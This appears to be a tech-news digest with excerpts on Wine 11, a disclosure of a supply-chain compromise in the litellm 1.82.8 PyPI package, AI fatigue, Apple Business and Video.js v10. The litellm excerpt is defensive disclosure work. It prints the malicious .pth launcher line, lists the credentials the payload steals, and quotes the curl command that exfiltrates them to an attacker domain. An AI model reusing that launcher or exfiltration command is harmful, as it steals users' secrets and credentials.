10 interesting stories served every morning and every evening.




1 987 shares, 58 trendiness

Wine 11 rewrites how Linux runs Windows games at the kernel level, and the speed gains are massive

Linux gam­ing has come a long way. When Valve launched Proton back in 2018, it felt like a turn­ing point, turn­ing the Linux gam­ing ex­pe­ri­ence from technically pos­si­ble if you’re okay with a lot of pain” to some­thing that more or less worked. Since then, we’ve seen in­cre­men­tal Wine re­leases, each one chip­ping away at com­pat­i­bil­ity is­sues and im­prov­ing per­for­mance bit by bit. Wine 10, Wine 9, and so on; each one a col­lec­tion of bug fixes and small im­prove­ments that kept the ecosys­tem mov­ing for­ward.

Wine 11 is dif­fer­ent. This is­n’t just an­other yearly re­lease with a few hun­dred bug fixes and some com­pat­i­bil­ity tweaks. It rep­re­sents a huge num­ber of changes and bug fixes. However, it also ships with NTSYNC sup­port, which is a fea­ture that has been years in the mak­ing and rewrites how Wine han­dles one of the most per­for­mance-sen­si­tive op­er­a­tions in mod­ern gam­ing. On top of that, the WoW64 ar­chi­tec­ture over­haul is fi­nally com­plete, the Wayland dri­ver has grown up a lot, and there’s a big list of smaller im­prove­ments that col­lec­tively make this feel like an all-new pro­ject.

I should be clear: not every game is go­ing to see a night-and-day dif­fer­ence. Some ti­tles will run iden­ti­cally to be­fore. But for the games that do ben­e­fit from these changes, the im­prove­ments range from no­tice­able to ab­surd. And be­cause Proton, SteamOS, and every down­stream pro­ject builds on top of Wine, those gains trickle down to every­one.

Everything up un­til now was a workaround

Esync and fsync worked, but they weren’t ideal

If you’ve spent any time tweak­ing Wine or Proton set­tings, you’ve prob­a­bly en­coun­tered the terms esync” and fsync” be­fore. Maybe you tog­gled them on in Lutris, or no­ticed them in Proton launch op­tions, with­out fully un­der­stand­ing what they do. To un­der­stand why NTSYNC mat­ters, you need to un­der­stand the prob­lem these so­lu­tions were all try­ing to solve.

Windows games, es­pe­cially mod­ern ones, are heav­ily multi-threaded. Your CPU is­n’t just run­ning one thing at a time, and in­stead, it’s jug­gling ren­der­ing, physics cal­cu­la­tions, as­set stream­ing, au­dio pro­cess­ing, AI rou­tines, and more, all in par­al­lel across mul­ti­ple threads. These threads need to co­or­di­nate with each other con­stantly. One thread might need to wait for an­other to fin­ish load­ing a tex­ture be­fore it can ren­der a frame. Another might need ex­clu­sive ac­cess to a shared re­source so two threads don’t try to mod­ify it si­mul­ta­ne­ously.

Windows han­dles this co­or­di­na­tion through what are called NT syn­chro­niza­tion prim­i­tives… mu­texes, sem­a­phores, events, and the like. They’re baked deep into the Windows ker­nel, and games rely on them heav­ily. The prob­lem is that Linux does­n’t have na­tive equiv­a­lents that be­have ex­actly the same way. Wine has his­tor­i­cally had to em­u­late these syn­chro­niza­tion mech­a­nisms, and the way it did so was, to put it sim­ply, not ideal.

The orig­i­nal ap­proach in­volved mak­ing a round-trip RPC call to a ded­i­cated kernel” process called wine­server every sin­gle time a game needed to syn­chro­nize be­tween threads. For a game mak­ing thou­sands of these calls per sec­ond, that over­head added up fast and served to be a bot­tle­neck. And it was a bot­tle­neck that man­i­fested as sub­tle frame stut­ters, in­con­sis­tent frame pac­ing, and games that just felt a lit­tle bit off even when the raw FPS num­bers looked fine.

Esync was the first at­tempt at a workaround. Developed by Elizabeth Figura at CodeWeavers, it used Linux’s eventfd sys­tem call to han­dle syn­chro­niza­tion with­out bounc­ing through the wine­server. It worked, and it helped, but it had quirks. Some dis­tros ran into is­sues with file de­scrip­tor lim­its, since every syn­chro­niza­tion ob­ject needed its own file de­scrip­tor, and games that opened a lot of them could hit the sys­tem’s ceil­ing quite quickly.

Fsync came next, us­ing Linux fu­texes for even bet­ter per­for­mance. It was faster than esync in most cases, but it re­quired out-of-tree ker­nel patches that never made it into the main­line Linux ker­nel or to up­stream Wine out of the box. That meant you needed a cus­tom or patched ker­nel to use it, which is fine for en­thu­si­asts run­ning CachyOS or Proton-GE, but not ex­actly ac­ces­si­ble for the av­er­age user on Ubuntu or Fedora. Futex2, of­ten re­ferred to in­ter­change­ably with fsync, did make it to Linux ker­nel 5.16 as fu­tex_waitv, but the orig­i­nal im­ple­men­ta­tion of fsync is­n’t that. Fsync used fu­tex_wait­_­mul­ti­ple, and Futex2 used fu­tex_waitv. Applications such as Lutris still re­fer to it as Fsync, though. It’s still kind of fsync, but it’s not the orig­i­nal fsync.

Here’s the thing about both esync and fsync: they were workarounds. Clever ones, but workarounds nonethe­less. They ap­prox­i­mated NT syn­chro­niza­tion be­hav­ior us­ing Linux prim­i­tives that weren’t de­signed for the job, and cer­tain edge cases sim­ply could­n’t be han­dled cor­rectly. Operations like NtPulseEvent() and the wait-for-all” mode in NtWaitForMultipleObjects() re­quire di­rect con­trol over the un­der­ly­ing wait queues in ways that user-space im­ple­men­ta­tions just can’t re­li­ably pro­vide.

Synchronization at the ker­nel-level, rather than in user-space

NTSYNC takes a com­pletely dif­fer­ent ap­proach. Instead of try­ing to shoe­horn Windows syn­chro­niza­tion be­hav­ior into ex­ist­ing Linux prim­i­tives, it adds a new ker­nel dri­ver that di­rectly mod­els the Windows NT syn­chro­niza­tion ob­ject API. It ex­poses a /dev/ntsync de­vice that Wine can talk to, and the ker­nel it­self han­dles the co­or­di­na­tion. No more round trips to wine­server, no more ap­prox­i­ma­tions, and the syn­chro­niza­tion hap­pens in the ker­nel, which is where it should be. And it has proper queue man­age­ment, proper event se­man­tics, and proper atomic op­er­a­tions.

What makes this even bet­ter is that NTSYNC was de­vel­oped by the same per­son who cre­ated esync and fsync in the first place. Elizabeth Figura has been work­ing on this prob­lem for years, it­er­at­ing through mul­ti­ple ker­nel patch re­vi­sions, pre­sent­ing the work at the Linux Plumbers Conference in 2023, and push­ing through mul­ti­ple ver­sions of the patch set be­fore it was fi­nally merged into the main­line Linux ker­nel with ver­sion 6.14.

The num­bers are wild. In de­vel­oper bench­marks, Dirt 3 went from 110.6 FPS to 860.7 FPS, which is an im­pres­sive 678% im­prove­ment. Resident Evil 2 jumped from 26 FPS to 77 FPS. Call of Juarez went from 99.8 FPS to 224.1 FPS. Tiny Tina’s Wonderlands saw gains from 130 FPS to 360 FPS. As well, Call of Duty: Black Ops I is now ac­tu­ally playable on Linux, too. Those bench­marks com­pare Wine NTSYNC against up­stream vanilla Wine, which means there’s no fsync or esync ei­ther. Gamers who use fsync are not go­ing to see such a leap in per­for­mance in most games.

The games that ben­e­fit most from NTSYNC are the ones that were strug­gling be­fore, such as ti­tles with heavy multi-threaded work­loads where the syn­chro­niza­tion over­head was a gen­uine bot­tle­neck. For those games, the dif­fer­ence is night and day. And un­like fsync, NTSYNC is in the main­line ker­nel, mean­ing you don’t need any cus­tom patches or out-of-tree mod­ules for it work. Any dis­tro ship­ping ker­nel 6.14 or later, which at this point in­cludes Fedora 42, Ubuntu 25.04, and more re­cent re­leases, will sup­port it. Valve has al­ready added the NTSYNC ker­nel dri­ver to SteamOS 3.7.20 beta, load­ing the mod­ule by de­fault, and an un­of­fi­cial Proton fork, Proton GE, al­ready has it en­abled. When Valve’s of­fi­cial Proton re­bases on Wine 11, every Steam Deck owner gets this for free.

All of this is what makes NTSYNC such a big deal, as it’s not sim­ply a run-of-the-mill per­for­mance patch. Instead, it’s some­thing much big­ger: this is the first time Wine’s syn­chro­niza­tion has been cor­rect at the ker­nel level, im­ple­mented in the main­line Linux ker­nel, and avail­able to every­one with­out jump­ing through hoops.

If NTSYNC is the head­line fea­ture, the com­ple­tion of Wine’s WoW64 ar­chi­tec­ture is the change that will qui­etly im­prove every­one’s life go­ing for­ward. On Windows, WoW64 (Windows 32-bit on Windows 64-bit) is the sub­sys­tem that lets 32-bit ap­pli­ca­tions run on 64-bit sys­tems. Wine has been work­ing to­ward its own im­ple­men­ta­tion of this for years, and Wine 11 marks the point where it’s of­fi­cially done.

What this means in prac­tice is that you no longer need 32-bit sys­tem li­braries in­stalled on your 64-bit Linux sys­tem to run 32-bit Windows ap­pli­ca­tions. Wine han­dles the trans­la­tion in­ter­nally, us­ing a sin­gle uni­fied bi­nary that au­to­mat­i­cally de­tects whether it’s deal­ing with a 32-bit or 64-bit ex­e­cutable. The old days of in­stalling mul­ti­lib pack­ages, con­fig­ur­ing ia32-libs, or fight­ing with 32-bit de­pen­den­cies on your 64-bit dis­tro thank­fully over.

This might sound like a small qual­ity-of-life im­prove­ment, but it’s a mas­sive piece of en­gi­neer­ing work. The WoW64 mode now han­dles OpenGL mem­ory map­pings, SCSI pass-through, and even 16-bit ap­pli­ca­tion sup­port. Yes, 16-bit! If you’ve got an­cient Windows soft­ware from the 90s that you need to run for what­ever rea­son, Wine 11 has you cov­ered.

For gam­ing specif­i­cally, this mat­ters be­cause a sur­pris­ing num­ber of games, es­pe­cially older ones, are 32-bit ex­e­cuta­bles. Previously, get­ting these to work of­ten meant wrestling with your dis­tro’s mul­ti­lib setup, which var­ied in qual­ity and ease de­pend­ing on whether you were on Ubuntu, Arch, Fedora, or some­thing else en­tirely. Now, Wine just han­dles it for you.

The rest of Wine 11 is­n’t just filler

There are more fixes, too

It’s easy to let NTSYNC and WoW64 steal the spot­light, but Wine 11 is packed to the gills with other stuff worth talk­ing about.

The Wayland dri­ver has come a long way. Clipboard sup­port now works bidi­rec­tion­ally be­tween Wine and na­tive Wayland ap­pli­ca­tions, which is one of those things you don’t think about un­til it does­n’t work and it dri­ves you mad. Drag-and-drop from Wayland apps into Wine win­dows is sup­ported. Display mode changes are now em­u­lated through com­pos­i­tor scal­ing, which means older games that try to switch to lower res­o­lu­tions like 640x480 ac­tu­ally be­have prop­erly in­stead of leav­ing you with a bro­ken desk­top. If you’ve been hold­ing off on switch­ing from X11 to Wayland be­cause of Wine com­pat­i­bil­ity con­cerns, Wine 11 re­moves a lot of those bar­ri­ers.

On the graph­ics front, EGL is now the de­fault back­end for OpenGL ren­der­ing on X11, re­plac­ing the older GLX path. Vulkan sup­port has been bumped to API ver­sion 1.4, and there’s ini­tial sup­port for hard­ware-ac­cel­er­ated H.264 de­cod­ing through Direct3D 11 video APIs us­ing Vulkan Video. That last one is par­tic­u­larly in­ter­est­ing for games and ap­pli­ca­tions that use video play­back for things like cutscenes or in-game stream­ing.

Force feed­back sup­port has been im­proved for rac­ing wheels and flight sticks, which is great news if you’re run­ning a sim setup on Linux. As well, Bluetooth has re­ceived a new dri­ver with BLE ser­vices and proper pair­ing sup­port, MIDI sound­font han­dling has been im­proved for legacy game mu­sic, and there are a cou­ple of mi­nor ex­tras like Zip64 com­pres­sion sup­port, Unicode 17.0.0 sup­port, TWAIN 2.0 scan­ning for 64-bit apps, and IPv6 ping func­tion­al­ity.

Thread pri­or­ity man­age­ment has been im­proved on both Linux and ma­cOS, which helps with multi-threaded ap­pli­ca­tion per­for­mance be­yond just the NTSYNC gains. ARM64 de­vices can now sim­u­late 4K page sizes on sys­tems with larger na­tive pages, which keeps the door open for Wine on Arm hard­ware. And with more Arm-based Linux de­vices show­ing up every year, that mat­ters more than it used to.

Plus, there are a ton of bug fixes. Games like Nioh 2, StarCraft 2, The Witcher 2, Call of Duty: Black Ops II, Final Fantasy XI, and Battle.net all re­ceived spe­cific com­pat­i­bil­ity fixes, which is ad­di­tional to the broader im­prove­ments made across the board that will im­prove per­for­mance and com­pat­i­bil­ity across sig­nif­i­cantly more ti­tles.

Wine 11 is a big re­lease, and it’s not just NTSYNC that makes it the case. Sure, NTSYNC alone would have made it worth pay­ing at­ten­tion to, but com­bined with the WoW64 com­ple­tion, the Wayland im­prove­ments, and the sheer vol­ume of fixes, it’s the most im­por­tant Wine re­lease since Proton made Linux gam­ing vi­able. Everything built on top of Wine, from Proton to Lutris to Bottles, gets bet­ter be­cause of it. If you play games on Linux at all, Wine 11 is worth your time try­ing out.

...

Read the original on www.xda-developers.com »

2 713 shares, 26 trendiness

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer · Issue #24512 · BerriAI/litellm

The litellm==1.82.8 wheel pack­age on PyPI con­tains a ma­li­cious .pth file (litellm_init.pth, 34,628 bytes) that au­to­mat­i­cally ex­e­cutes a cre­den­tial-steal­ing script every time the Python in­ter­preter starts — no im­port litellm re­quired.

This is a sup­ply chain com­pro­mise. The ma­li­cious file is listed in the pack­age’s own RECORD:

pip down­load litellm==1.82.8 –no-deps -d /tmp/check

python3 -c

im­port zip­file, os

whl = /tmp/check/’ + [f for f in os.list­dir(‘/​tmp/​check’) if f.endswith(‘.whl’)][0]

with zip­file.Zip­File(whl) as z:

pth = [n for n in z.namelist() if n.endswith(‘.pth’)]

print(‘PTH files:’, pth)

for p in pth:

print(z.read(p)[:300])

You will see litellm_init.pth con­tain­ing:

im­port os, sub­process, sys; sub­process.Popen([sys.ex­e­cutable, -c”, import base64; exec(base64.b64de­code(‘…’))“])

The pay­load is dou­ble base64-en­coded. When de­coded, it per­forms the fol­low­ing:

The script col­lects sen­si­tive data from the host sys­tem:

* Webhook URLs: grep for Slack/Discord web­hook URLs in env and con­fig files

The col­lected data is en­crypted with openssl enc -aes-256-cbc -pbkdf2

The AES ses­sion key is en­crypted with a hard­coded 4096-bit RSA pub­lic key via openssl pkeyutl -encrypt -pkeyopt rsa_­padding_­mode:oaep

Both en­crypted files are packed into tpcp.tar.gz

The archive is ex­fil­trated via:

curl -s -o /dev/null -X POST \

https://​mod­els.litellm.cloud/ \

-H Content-Type: ap­pli­ca­tion/​octet-stream” \

-H X-Filename: tpcp.tar.gz” \

–data-binary @tpcp.tar.gz

* Trigger mech­a­nism: .pth files in site-pack­ages/ are ex­e­cuted au­to­mat­i­cally by the Python in­ter­preter on startup (see Python docs on .pth files). No im­port state­ment is needed.

* Stealth: The pay­load is dou­ble base64-en­coded, mak­ing it in­vis­i­ble to naive source code grep.

* Exfiltration tar­get: https://​mod­els.litellm.cloud/ — note the do­main litellm.cloud (NOT litellm.ai, the of­fi­cial do­main).

Anyone who in­stalled litellm==1.82.8 via pip has had all en­vi­ron­ment vari­ables, SSH keys, cloud cre­den­tials, and other se­crets col­lected and sent to an at­tacker-con­trolled server.

* Other ver­sions: Not yet checked — the at­tacker may have com­pro­mised mul­ti­ple re­leases

Users: Check for litellm_init.pth in your site-pack­ages/ di­rec­tory

Users: Rotate ALL cre­den­tials that were pre­sent as en­vi­ron­ment vari­ables or in con­fig files on any sys­tem where litellm 1.82.8 was in­stalled

...

Read the original on github.com »

3 654 shares, 33 trendiness

Is anybody else bored of talking about AI?

At se­ri­ous risk of sound­ing like a heretic here, but I’m kinda bored of talk­ing about AI.

I get it, AI is in­cred­i­ble. I use it every day, it’s com­pletely changed my work­flow. I re­cently started a new role in a tricky do­main work­ing at web scale (hey, re­mem­ber web scale?) and it’s al­lowed me to go from 0-1 in terms of pro­duc­tiv­ity in a mat­ter of weeks.

With that be­ing said, it’s all start­ing to feel a bit… rou­tine. I’m not here to ar­gue that the pace of change has been in­cred­i­ble, but on a day-to-day ba­sis I’ve sorta ran out of things to talk about. What makes this worse is it’s com­pletely taken over mind­share across my sec­tion of the in­ter­net.

Hacker News, my favourite haunt, used to be full of in­ter­est­ing pro­jects and prob­lems be­ing solved but this seems to have de­volved into three dif­fer­ent peo­ple’s (almost iden­ti­cal) Claude code work­flow and yet an­other post about how you got OpenClaw to stroke your cat and play video games so you had way more time to… con­fig­ure AI tool­ing. This all feels a lit­tle self-ful­fill­ing.

Kagi small web

is an­other great ex­am­ple of this ef­fect. Here’s a chal­lenge, open it up and press the next’ but­ton 20 times. What per­cent­age of posts are AI re­lated?

Before you write me off as old man yells at cloud’, un­der­stand where I’m com­ing from. In the good old days (2023), be­fore we called any­body who could open a Claude code ter­mi­nal an AI en­gi­neer’, be­ing a Product Engineer’ was the hot new term. The idea was that en­gi­neers should move away from ob­sess­ing over code to ob­sess­ing over the prod­uct value they were de­liv­er­ing. I loved this, it made loads of sense to me, but we seem to have re­gressed. It’s no longer the code we’re ob­sess­ing over, it’s the over­grown auto-com­plete we’ve de­vel­oped to make the eas­i­est part of be­ing an en­gi­neer eas­ier.

It’s like if I went onto the wood­work­ing sub­red­dit and they’d all stopped show­ing pic­tures of the ta­bles they’d cre­ated and just started post­ing about the ham­mer they were us­ing. But they were all us­ing ba­si­cally the same ham­mer in the same way, so they were just scream­ing the same shit at each other at the top of their voices.

What makes this worse, is our bosses have bought into it this time too. My man­agers never cared much about data­base tech­nolo­gies, IDEs or javascript frame­works; they just wanted the fea­ture so they could sell it. Management seems to have stepped firmly and some­what hap­haz­ardly into the im­ple­men­ta­tion de­tail now. I reckon most of us have got some sort of com­pany ini­tia­tive to use more AI in our ob­jec­tives this year. Management’s in­volve­ment in the SDLC has al­ways been a thing, DORA met­rics have been around for a while. But his­tor­i­cally, it’s al­ways been about the out­puts. Faster de­ploys, time to re­spond. Now we’re mea­sur­ing the num­ber of to­kens used per-dev, which is no more use­ful than lines of code ever was.

I guess what I’m say­ing, other than just hav­ing a gen­eral whinge, is tell me more about the cool shit you’re build­ing rather than the tools you’re us­ing to build it. And don’t for­get that the whole pur­pose of cod­ing, like any other craft, is to cre­ate some­thing that de­liv­ers value for some­one. Even if that some­one is just your­self.

… And yes, I’m painfully aware of the irony of a post about moan­ing about posts about AI. Sorry.

...

Read the original on blog.jakesaunders.dev »

4 644 shares, 30 trendiness

Introducing Apple Business — a new all-in-one platform for businesses of all sizes

Introducing Apple Business — a new all‑in‑one plat­form for busi­nesses of all sizes

Apple Business com­bines built-in mo­bile de­vice man­age­ment, busi­ness email and cal­en­dar ser­vices with cus­tom do­main sup­port, and a pow­er­ful new op­tion to reach lo­cal cus­tomers

Apple to­day an­nounced Apple Business, a new all-in-one plat­form that in­cludes key ser­vices com­pa­nies need to ef­fort­lessly man­age de­vices, reach more cus­tomers, equip team mem­bers with es­sen­tial apps and tools, and get sup­port from ex­perts to run and grow ef­fi­ciently and se­curely. Apple Business fea­tures built-in mo­bile de­vice man­age­ment, help­ing busi­nesses eas­ily con­fig­ure em­ployee groups, de­vice set­tings, se­cu­rity, and apps with Blueprints to quickly get started. In ad­di­tion, cus­tomers can now set up busi­ness email, cal­en­dar, and di­rec­tory ser­vices with their own do­main name for seam­less and el­e­vated com­mu­ni­ca­tion and col­lab­o­ra­tion. And Apple Business can help mil­lions of com­pa­nies grow their reach and con­nect with lo­cal cus­tomers across Apple Maps, Mail, Wallet, Siri, and more, in­clud­ing a new op­tion com­ing this sum­mer that will en­able busi­nesses in the U. S. and Canada to place lo­cal ads in Maps dur­ing key search and dis­cov­ery mo­ments. Apple Business will be avail­able start­ing Tuesday, April 14, in more than 200 coun­tries and re­gions.1

Apple Business is a sig­nif­i­cant leap for­ward in our decades-long com­mit­ment to help­ing com­pa­nies of all sizes lever­age the power of Apple prod­ucts and ser­vices to run and grow,” said Susan Prescott, Apple’s vice pres­i­dent of Enterprise and Education Marketing. We’ve uni­fied Apple’s strongest busi­ness of­fer­ings into one sim­ple, se­cure plat­form, de­liv­er­ing key fea­tures for or­ga­ni­za­tions in every stage and sec­tor, in­clud­ing built-in de­vice man­age­ment, col­lab­o­ra­tion tools, and ad­di­tional ways to reach new cus­tomers. We can’t wait to see how Apple Business helps com­pa­nies spend more time fo­cus­ing on what they love and con­nect­ing deeply with their com­mu­ni­ties.”

Apple Business of­fers built-in mo­bile de­vice man­age­ment (MDM), fa­cil­i­tat­ing a com­pre­hen­sive view of an or­ga­ni­za­tion’s Apple de­vices, set­tings, and more from a sin­gle in­ter­face. Previously avail­able as a sub­scrip­tion within Apple Business Essentials in the U. S., Apple Business is de­signed to make IT easy — in­clud­ing for small busi­nesses with­out ded­i­cated IT re­sources. Apple Business in­cludes new Blueprints to eas­ily set up de­vices with pre­con­fig­ured set­tings and apps, en­sur­ing con­sis­tency and se­cu­rity and en­abling zero-touch de­ploy­ment for em­ploy­ees, so that new Apple prod­ucts are ready to go out of the box.2

Apple Business in­cludes op­tions to pur­chase up­graded iCloud stor­age and sup­port with AppleCare+ for Business, and a com­pan­ion Apple Business app will al­low em­ploy­ees to in­stall apps for work, view col­league con­tact in­for­ma­tion, and re­quest sup­port while on the go.3

Apple Business ex­pands the avail­abil­ity of Apple Business Manager to more than 200 coun­tries and re­gions, and sup­ports ad­di­tional de­vice man­age­ment fea­tures, in­clud­ing:

* Managed Apple Accounts: Company data re­mains se­cure while em­ployee data re­mains pri­vate, with cryp­to­graphic sep­a­ra­tion of work and per­sonal data on de­vices. Apple Business en­ables au­to­mated Managed Apple Account cre­ation for new em­ploy­ees through in­te­gra­tion with an iden­tity ser­vice provider, in­clud­ing Google Workspace, Microsoft Entra ID, and more.

* Employee man­age­ment: Create user groups by func­tion or team to as­sign apps and roles. Organizations can also cre­ate cus­tom roles to man­age ac­cess ex­actly the way they want.

* App dis­tri­b­u­tion: Easily ac­quire and dis­trib­ute apps to em­ploy­ees and teams through the App Store.

* Admin API: Simplify large de­ploy­ments with API ac­cess to de­vice, user, au­dit, and MDM ser­vice data.

New Ways to Manage Productivity and Collaboration

Apple Business in­tro­duces fully in­te­grated email, cal­en­dar, and di­rec­tory ser­vices that are de­signed to make it seam­less to start a new busi­ness with a pro­fes­sional iden­tity. Businesses can bring their own cus­tom do­main name or pur­chase a new one through Apple Business, help­ing founders el­e­vate com­mu­ni­ca­tion and col­lab­o­ra­tion. These ser­vices stream­line op­er­a­tions, with sched­ul­ing tools like cal­en­dar del­e­ga­tion and a built-in com­pany di­rec­tory to make it easy for em­ploy­ees to con­nect with user groups and per­son­al­ized con­tact cards.

Every day, users choose Apple Maps to dis­cover and ex­plore places and busi­nesses around them. Beginning this sum­mer in the U. S. and Canada, busi­nesses will have a new way to be dis­cov­ered by us­ing Apple Business to cre­ate ads on Maps. Ads on Maps will ap­pear when users search in Maps, and can ap­pear at the top of a user’s search re­sults based on rel­e­vance, as well as at the top of a new Suggested Places ex­pe­ri­ence in Maps, which will dis­play rec­om­men­da­tions based on what’s trend­ing nearby, the user’s re­cent searches, and more. Ads will be clearly marked to en­sure trans­parency for Maps users.

Ads on Maps builds on Apple’s broader pri­vacy-first ap­proach to ad­ver­tis­ing, and main­tains the same pri­vacy pro­tec­tions Maps users en­joy to­day. A user’s lo­ca­tion and the ads they see and in­ter­act with in Maps are not as­so­ci­ated with a user’s Apple Account. Personal data stays on a user’s de­vice, is not col­lected or stored by Apple, and is not shared with third par­ties. When Apple Business is avail­able in April, busi­nesses will need to first claim their lo­ca­tion on Maps. Once ads on Maps is avail­able, busi­nesses will be able to ac­cess a fully au­to­mated ex­pe­ri­ence of cre­at­ing ads through Apple Business in a few sim­ple steps. Current Apple Ads ad­ver­tis­ers and agen­cies will also have the op­tion to book ads through their ex­ist­ing Apple Ads ex­pe­ri­ence, which will of­fer ad­di­tional cus­tomiza­tion op­tions for their ad cam­paigns.

Brand and Location Features in One Convenient Place

Brand man­age­ment tools pre­vi­ously avail­able in Apple Business Connect will now be avail­able through Apple Business, mak­ing it eas­ier than ever for busi­nesses to set up and man­age how their brand and lo­ca­tions ap­pear across Apple ser­vices and apps.

* Brand pro­files: Manage brand name, logo, and key de­tails con­sis­tently across Apple Maps, Wallet, and other fea­tures and apps.

* Rich place cards: Customize with pho­tos, de­tailed lo­ca­tion in­for­ma­tion, hours, and other use­ful de­tails that dis­play across Apple Maps, Safari, Spotlight, and more.

* Showcases and cus­tom ac­tions: Highlight deals, spe­cial of­fers, new prod­ucts, or sea­sonal items on place cards in Maps. Add cus­tom ac­tions like or­der or re­serve to di­rect cus­tomers to a pre­ferred web­site or app.

* Location in­sights: Gain valu­able in­sights into how cus­tomers dis­cover and in­ter­act with busi­nesses on Maps, in­clud­ing search, views, and taps on ac­tions.

* Branded com­mu­ni­ca­tions: Display brand­ing promi­nently in the Mail app and on iCloud Mail to in­crease aware­ness. Branding will dis­play with tracked or­ders in Wallet for a more rec­og­niz­able cus­tomer ex­pe­ri­ence.

* Tap to Pay on iPhone: Build trust by dis­play­ing a brand logo and name on the pay­ment screen when ac­cept­ing pay­ments di­rectly on iPhone.

* Starting April 14, Apple Business will be avail­able as a free ser­vice in the U.S. and 200+ coun­tries and re­gions to new and ex­ist­ing users of Apple Business Connect, Apple Business Essentials, and Apple Business Manager. For more in­for­ma­tion, visit busi­ness.ap­ple.com/​pre­view.

* Ads on Apple Maps will be avail­able to busi­nesses start­ing this sum­mer in the U.S. and Canada. For more in­for­ma­tion, visit ads.ap­ple.com/​maps.

* Apple Business Essentials, Apple Business Manager, and Apple Business Connect will no longer be avail­able once Apple Business launches. Business Essentials cus­tomers will no longer be charged their monthly ser­vice fee for de­vice man­age­ment af­ter April 14. Existing Business Connect data — in­clud­ing claimed lo­ca­tions, place card in­for­ma­tion, pho­tos, or­ga­ni­za­tion in­for­ma­tion, ac­count de­tails, and more — will au­to­mat­i­cally mi­grate to Apple Business at launch.

* The Apple Business com­pan­ion app, along with email, cal­en­dar, and di­rec­tory fea­tures, will re­quire iOS 26, iPa­dOS 26, or ma­cOS 26.

* Customers in the U.S. can pur­chase ad­di­tional iCloud stor­age up to 2TB per user, start­ing at $0.99 per user per month. AppleCare+ for Business cov­er­age is avail­able per de­vice or per user, start­ing at $6.99 per month, or $13.99 per month per user for up to three de­vices.

Apple Business is avail­able glob­ally; cer­tain fea­tures may be avail­able in se­lect coun­tries and re­gions. See busi­ness.ap­ple.com/​pre­view for more de­tails.

Zero-touch de­ploy­ment is avail­able when de­vices are pur­chased through Apple or Apple Authorized Resellers.

Additional iCloud stor­age and AppleCare+ for Business are avail­able as ad­di­tional paid of­fer­ings.

...

Read the original on www.apple.com »

5 490 shares, 12 trendiness

Oil traders bet millions ahead of Trump's Iran talks post

We are sur­veilling mar­kets and our ap­proach to mar­ket abuse will be to look at the ev­i­dence in front of us. I can’t speak for what our US col­leagues are do­ing,” he said.

...

Read the original on www.bbc.com »

6 434 shares, 30 trendiness

Video.js v10 Beta: Hello, World (again)

Today we’re ex­cited to re­lease the Video.js v10.0.0 beta. It’s the re­sult of a rather large ground-up rewrite, not just of Video.js (discussion) but also of Plyr, Vidstack, and Media Chrome, through a rare team­ing-up of open source pro­jects and peo­ple who care a lot about web video, with a com­bined 75,000 github stars and tens of bil­lions of video plays monthly.

I built Video.js 16 years ago to help the tran­si­tion from Flash to HTML5 video. It’s grown a lot since then with the help of many peo­ple, but the code­base and APIs have con­tin­ued to re­flect a dif­fer­ent era of web de­vel­op­ment. This re­build mod­ern­izes the player both for how de­vel­op­ers build to­day and sets up the foun­da­tion for the next sig­nif­i­cant tran­si­tion to AI-augmented fea­tures and de­vel­op­ment.

* Shrinking bun­dle sizes, and then shrink­ing them more (88% re­duc­tion in de­fault bun­dle size)

* Allowing deep cus­tomiza­tion us­ing the fa­mil­iar de­vel­op­ment pat­terns of your cho­sen frame­work — in­clud­ing new first-class React, Typescript, and Tailwind sup­port

* Making the de­faults look beau­ti­ful and per­form beau­ti­fully (The ex­perts are call­ing me say­ing Sir, how did you make it so great?”. It’s in­cred­i­ble, re­ally.)

* Designing the code­base and docs so AI agents build­ing your player along­side you can ac­tu­ally be good at it

We’re pretty sure it works dif­fer­ently from what you’ve come to ex­pect of a web me­dia player, while we hope it feels more fa­mil­iar to how you ac­tu­ally build.

One of the biggest com­plaints about video play­ers to­day is their file size, of­ten weigh­ing in around 1MB mini­fied and hun­dreds of KB gzipped. Players are sneak­ily-com­plex ap­pli­ca­tions so there’s only so many bytes you can shave off, but legacy play­ers were built in times be­fore smart bundlers, tree shak­ing, and other size-sav­ing op­por­tu­ni­ties. They carry with them many fea­tures you may not be ac­tively us­ing.

The Video.js v10 de­fault player is now 88% smaller than the size of the pre­vi­ous ver­sion’s (v8.x.x) de­fault. A good chunk of those sav­ings come from the de­ci­sion to un­bun­dle adap­tive bi­trate (ABR) sup­port, which you could re­move in the pre­vi­ous ver­sion by in­stead im­port­ing from video.js/​core , but the ma­jor­ity of video.js in­stalls just use the de­fault bun­dle while also not us­ing the adap­tive stream­ing fea­tures. Comparing more sim­i­lar ap­ples, with ABR re­moved, the v10 de­fault video player (HTML) is still 66% smaller than the size of the pre­vi­ous ver­sion, get­ting even smaller from there de­pend­ing on which bun­dle you need.

While the pre­vi­ous sec­tion was com­par­ing play­ers with­out ABR, a lot of the weight of a fully-fea­tured video player comes from the stream­ing en­gine which is needed to han­dle adap­tive bi­trate (ABR) for­mats like HLS and DASH — for man­i­fest pars­ing, seg­ment load­ing, buffer man­age­ment, ABR logic, codec de­tec­tion, MSE in­te­gra­tion, DRM, server-side ads, and more. Similar to play­ers, tra­di­tional stream­ing en­gines have mono­lithic ar­chi­tec­tures mak­ing it dif­fi­cult to get the bun­dle size smaller.

As part of v10 we’ve started a new en­gine pro­ject called SPF 😎 (Streaming Processor Framework), which is a frame­work built around func­tional com­po­nents that are com­posed into pur­pose-built, smaller stream­ing en­gines. For ex­am­ple if you have a short-form video app with sim­ple adap­tive stream­ing needs, your en­gine won’t ship with any code for DRM and ads.

For a sim­ple HLS use case, Video.js v10 us­ing SPF is only 19% the file size of Video.js v8 in­clud­ing adap­tive bi­trate stream­ing (ABR).

Comparing en­gines to en­gines you get a clearer pic­ture of the story. The other en­gines are very dif­fi­cult to get any smaller with­out fork­ing them, while the en­gine com­posed us­ing SPF only in­cludes what’s needed for sim­ple adap­tive stream­ing us­ing HLS, mak­ing it only 12% the file size of even HLS.js-light .

To be clear, the im­me­di­ate goal is­n’t for SPF to re­place the full-fea­tured en­gines like HLS.js for ad­vanced stream­ing use cases, and in fact v10 works with all these stream­ing en­gines to­day. The goal is to achieve much smaller file sizes for com­mon, sim­pler use cases. At the same time we think a lot more sites and apps could ben­e­fit from sim­ple ABR, and we want SPF to lower the file size cost of us­ing it.

With v10 the file size story does­n’t ac­tu­ally start with the base­line builds. The li­brary is built for com­pos­ing a player with only what’s needed, al­low­ing for sim­ple use cases to be even smaller.

